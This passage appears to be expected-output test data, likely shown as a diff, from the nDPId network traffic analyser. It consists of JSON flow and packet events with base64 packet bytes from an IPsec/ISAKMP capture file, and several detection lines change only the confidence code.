00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMzoVAAD8RgF7AqAJkbe27gzikEZQAeI6gAAAAACmGibu7DGYryhiyRAKATQQuICMIAAAAAgAAAGwwAABQ7i9ltNSVoV2B7+spzMyxdFmVFpNCdGsnS1zYOWtZLLJ3jn5hta9uxbRTOuryQ1nfs8LoZe2STMzHnZYYlmsTR8H0L25CA7tIlvnPbQ=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"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\/JFU551AW7MyoUJsnnIFWRTt8Hp07Dm7IvhAdkO6fUAM\/X+LZb+GheG49xaJX4ZpDDw\/MVu9lKUJuuFxBcJD0gviRwYWDrDJAeloJzwIl88n9jiNXQaFXBtKBWnfoC\/pQwJ70quZAfVGTIXarTofpKQAAJEiOJbzbqJu93mWlhlAfM\/c4hyE2\/vYAR2i8uJ7W5MEqKQAAHAAAQATSOs\/buyb4UkO\/79vj\/opzawTOeAAAABwAAEAF9FH7yboKURb0ASubrkp\/zwruocY="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQIusAAPcRs\/Zt7bvBwKgCZAH0KQQAPCbzDC7fJGbFXWMAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFV7sh5\/22ST31yX0r43Q=="} 01523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAM8FVVAAD8RNqHAqAJkbe27wSkEAfQDKFK8DC7fJGbFXWMAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFV7sh5\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\/JFU551AW7MyoUJsnnIFWRTt8Hp07Dm7IvhAdkO6fUAM\/X+LZb+GheG49xaJX4ZpDDw\/MVu9lKUJuuFxBcJD0gviRwYWDrDJAeloJzwIl88n9jiNXQaFXBtKBWnfoC\/pQwJ70quZAfVGTIXarTofpKQAAJEiOJbzbqJu93mWlhlAfM\/c4hyE2\/vYAR2i8uJ7W5MEqKQAAHAAAQATSOs\/buyb4UkO\/79vj\/opzawTOeAAAABwAAEAF9FH7yboKURb0ASubrkp\/zwruocY="} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMFV1AAD8RNonAqAJkbe27wTikEZQDOEjvAAAAAAwu3yRmxV1jIFciNwR80qEuICMIAAAAAQAAAywjAAMQrTNm3y3nKpCfJGJLzq4WoeJCKiySVfARcaLVldW1nV8TarpHf45O4kn4P088BsGCuvuuV3Zjz7HvPeNDTTMf4tTEEbFO+pYNIajmLo\/0MCdGjy6TTcKRfaV2HKNOGA9rBOzUgyRNBSth+rMnuxISK3JPGHdog7GxqUEvnYZJv6OzC4fGLuCnL5wy\/L50Ty2Fg3pvXIrsXaUHwli0W3VEs+M1\/AyVdowUZu\/IsLptb5Ywqx9mamanagQbw5+zJI6IIdw7nr9xWaabNoFd49XPf5IOG0oN81cMtm9wKEcZ8ixoF+L82gwp\/pYH0lK\/bbEcVFjhVpZ\/f\/MVtxKixJVEEdvADpZTg8O4Zlk7jT54AIXHlN6rEhLhrajMocSyvUhC7BimUe32xEJLcQZKXjv3wCg7FDRUEpqPxnsTiyog8Li9OE293W7JmcZVk15cFNneXQ70VpAS6qFWcmJDLFGIuHQn2e8F\/tOfKsjkEU9CRQvRNWk\/D+p8puFicnw0V9LRUy6uGLZxVhIGKS53neDw2kl7mBLLFGMep8mYh\/EO\/\/43jUD056pVqWMold3bWe+ENXpplt8rNUMdHP1gpUwXVXsuMG4JxEVoRS2kuRVOk+0MZSR0qWpix3lng4UvvIbUsH8LOmBG0LvWOPT+Y2\/vxk5QUXqsL7dKfHnf8S3qaEHIUYxj1fc3KS2BlJd3Cv+gtlVL0IzPondNSkBm3bTpLJzQAh82sInj5YGm24c1BN6ris3aym186S4CJNZ85t61td5r84KOzzlhZI\/8gthnkxJqfxAy56DReSYyVqZI3gKtdvFc+11TbVGwphGoKye6DcPPG6R9j5t6QYfYlqD1YMGmUiJZY8P2i8xB6AZFkNfgz1lgyuFNARXzCvb
zdpuAqBpg9IgGpIoSzktXS+oIlZWHBtFqi5IM4urBJvoIxQ\/LOftR\/3RCCtLHSIF92B0NV1hTbSxyXobFKVDbyTqen4hmkqrNSj3NAInd6rAKd2PiJHYKSGR5o18lKUM23CRw+\/1tANxXoFAkW1x1"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsI9UAAPcRsnBt7bvBwKgCZBGUOKQA2AuLAAAAAAwu3yRmxV1jIFciNwR80qEuICMgAAAAAQAAAMwkAACwdm4ZqCn08scaTnuI9jZrtMOzwvKgCzLssEi17hqLdF52wfrjwlGnWHg4s7Htz\/Gxnh\/s0RPdhVSIN6eLY0tie04uvE5BsloxH7yxzkeCVrt16zA+hjPcXUPmxiTk9zs8awO3ouDCi50PL7v1Djwqke5YKqZs31YlwMVpuMXvtjQmPgylOFFjn44ZNCyP+ZBH4qdQEdwueJNrpZ2EQ7a1r8i7f8xHxKHHyczyEw=="} 00599{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMFclAAD8RON3AqAJkbe27wTikEZQAeDIOAAAAAAwu3yRmxV1jIFciNwR80qEuICMIAAAAAgAAAGwwAABQVYMVSYyJ9gFWH7kETb2fU7dCYGW\/nqvCy2sJP\/JPQTMkiwZXC67JYZ\/uOaJ7kC8TcwUVknprrjkRxrCJVq1wLiNMXgpKaYe8r38Unw=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"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\/QqzbUl4TfVDbWtcIRhWbw1c7xzhe471e2uourx4gK4yu\/qx\/GMXpPCmq+AfIfCRxyfNb4eRtQdBek4+utR7rvvK74A9iefLvlsEBGQs3U+sNqUk9a13Hk+LhSeZopenNjNGBCXlMHDJtGZQCjGlhOR9N57RZan1wqNSI8CKQAAJK7\/+nXDLTKRQBD8OLeC6WRl3oX4ocuiIUqLdUtxFTBTKQAAHAAAQASCMP3w8Pive3ai2x+IuNuOWp8BpgAAABwAAEAFhhuQtn334e4kKy6crkOBRJ7fU3o="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQy0gAAPcRC3dt7bvjwKgCZAH0KQQAPOj3xPeugZRTkDEAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1IEHINlsQhrJ2YmIIdA=="} 01516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/QqzbUl4TfVDbWtcIRhWbw1c7xzhe471e2uourx4gK4yu\/qx\/GMXpPCmq+AfIfCRxyfNb4eRtQdBek4+utR7rvvK74A9iefLvlsEBGQs3U+sNqUk9a13Hk+LhSeZopenNjNGBCXlMHDJtGZQCjGlhOR9N57RZan1wqNSI8CKQAAJK7\/+nXDLTKRQBD8OLeC6WRl3oX4ocuiIUqLdUtxFTBTKQAAHAAAQASCMP3w8Pive3ai2x+IuNuOWp8BpgAAABwAAEAFhhuQtn334e4kKy6crkOBRJ7fU3o="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMqP1AAD8RosbAqAJkbe274zikEZQDOAwPAAAAAMT3roGUU5AxVDreTwHgKMguICMIAAAAAQAAAywjAAMQFHKN09w9JMuSdVLZlDSAEdBZPZLf0YlLUCDGVaU4QgA5R4PwVc1wGlnCVUekrSEI8G+hJ73vPBs9A2R54slBgUkD5OtsgkU2Y\/ysdvbeFjfl5aOOU8P2AP0+nE4nxoL3ihUJF\/r5A8\/qioOtIJzpb7UTY7FEOHgakNDQyZ9vaAwZXlWs41+Th6nJ0MpAQLpgozSOJ9FAzZeaM0eBMdzcI2Q4S0GkesbeAgagn\/f2DKDyFAKLBtf6MJ1vlQ54CVKtTzUaZfkrk6hU4syCkcLZNoFIb1mnNiDsPxk32uw0XmKLZ4AB5DJWse1LYivWsOqVJqqjMO3HhnEG2Dx5awhDcFxp60atvgtj6L6XoPvOgq\/qXj\/z5PXlZQkAJAp+cZbmGSvhVgatLb0+tsz\/OyULncHx\/VO6Kqi9P+MAPAxEZC9A\/95WSldUKrkqHiz8sZsukvkW1AZ0rEqkgeazDwoZXjpNDR3XGIO7jwp4VRlinrEP+Kowk20+gIBA8+dHAOiz9florZrS3Uj1s+5mTjawwBtWbyf1VjJgr\/78WCw6ONAmxOiC+FJX9fBcH9xN6I1X3K8ABoYfUvOOT02L+JNLD2qEVfwPyjGhr3UARSE6l2T2B8959OepMY6co3ui9z1UXnahE0GR9i2pLhrDW4mTskfgGwmp\/68Y1BDrCYB39Y0AhqU4uZZHrB0pR6SpVR1EP2KSVRgkwvgbrOUep+9Vt7GRB5bao9BCnpTL7AEOqOwhIgx5ynAqJES\/eCKH\/kwRYj4USVpn52VpEg9ILhoE+urAKkETY\/cLVH4Ak5ugCbOEfPdHfj9D0rGeNiWqOShVrPj2Mq3v0Zfwkhsyk74blWlkAR2RmgMcM23i58MXkQ0U+VJXSAEguUMhvfDjmZv6lKz84CphJcLPMSj84HVTd9wWCLF6tkZx7q3+E50I6mOu\/OpnQrsLV4\/HbMMztvL4nGxR1fiQo\/Tmpi848uW5uwvfyfq2cIAXQIsRkAi6L9PFk7Wdod7gdoBv9qnMuYyOxSYvFaApLUSPsZnf"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsy5UAAPcRCo5t7bvjwKgCZBGUOKQA2N2eAAAAAMT3roGUU5AxVDreTwHgKMguICMgAAAAAQAAAMwkAACw3+hDUjEFQ6MgpqAEcApKvn9uh3qVHzhAobzzdsLHNL0cE0MCy6hqRcHq2zyFYxqKUvV9qpSoUCOXzZX8acXWksJkwcZvlj3pHUnomqGBUy7YKx8\/BoUpsdZ+YJ66Urw6XFHoKHyVFJYrxhfDTA96A3GMtNoZk+CLmvMZh9uGXGXGb9zoZqBq9vHjZRx\/MplOtNEvpcXqGaCwVYcGtrGfedPqueJGKjXMXpyHhw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMqXpAAD8RpQnAqAJkbe274zikEZQAeOw1AAAAAMT3roGUU5AxVDreTwHgKMguICMIAAAAAgAAAGwwAABQp3zPqAaPZdCtSbotjrN0irXGcY7JpOGxC6pjgSY\/TZB8lMPX2DP1QKzYFMuSni2xVCT2eLDFep09w0XbtiWVOI2z82MP7LPt5iJg1A=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"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\/bmnkd4oik6yfXzF2nnT5++MrBWp59hXjvpQG7CUKBYM2qK1rCYScGFGvoCH+VaOstA9qnbA93UZ+lGrf8oiyLKNCUx8EmTjNr1npSw0KQAAJEdv70J9iweqoyFFLnrl4Zzojnhs5HDATx3IKPlr2BaOKQAAHAAAQASxGcGDddgOxJ\/uFM4nQfEOTHdh1AAAABwAAEAFw3IlZSVVICry3JG3pa18XmliW9c="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQEZ0AAPcRxSNt7bviwKgCZAH0KQQAPGsMqwswX1pdWlQAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAE1KWcIrU8y8ddQ+ocSmg=="} 01514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/bmnkd4oik6yfXzF2nnT5++MrBWp59hXjvpQG7CUKBYM2qK1rCYScGFGvoCH+VaOstA9qnbA93UZ+lGrf8oiyLKNCUx8EmTjNr1npSw0KQAAJEdv70J9iweqoyFFLnrl4Zzojnhs5HDATx3IKPlr2BaOKQAAHAAAQASxGcGDddgOxJ\/uFM4nQfEOTHdh1AAAABwAAEAFw3IlZSVVICry3JG3pa18XmliW9c="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMUU9AAD8R+nXAqAJkbe274jikEZQDODTyAAAAAKsLMF9aXVpU8rNpjARABmguICMIAAAAAQAAAywjAAMQ6Z9u6sp21FHw9VexxCL4jh1V4W3sanbv3b88odA16POyeoQKizKd2HmgH0NR\/U2FyiZQbxMqa7XMYFNMKV8428rCLY18jtse\/+ckrrjC9sewybMICEnJmMxbdEFF4AvTOGL3EKm3QT3Eg1HZ9ZSp\/t6tPSaAEKa3raNeV99MYev4bqmPqlmHO+GKwCUOmb\/\/WhuLPmluPOe2TBGJ66thL1vwc72vZmjJ35sjKPelra23UF5Cwj3EkN31PcPlnagyUKfFKe0tDEhi\/zcayi6IA3RQ45CcmYuYtppgdkgTrA4X8ySF2RNmlXfMSxeShomsWVIrcXowlFEptytcNtavQUOqRSsiRoCAesd4J0mAZlQJTHBJQkJF5D5oyy3uKyGkRMPJ4QqGe91skWMr4dklLDyu3k1\/Ki566+JgYKR97wLMp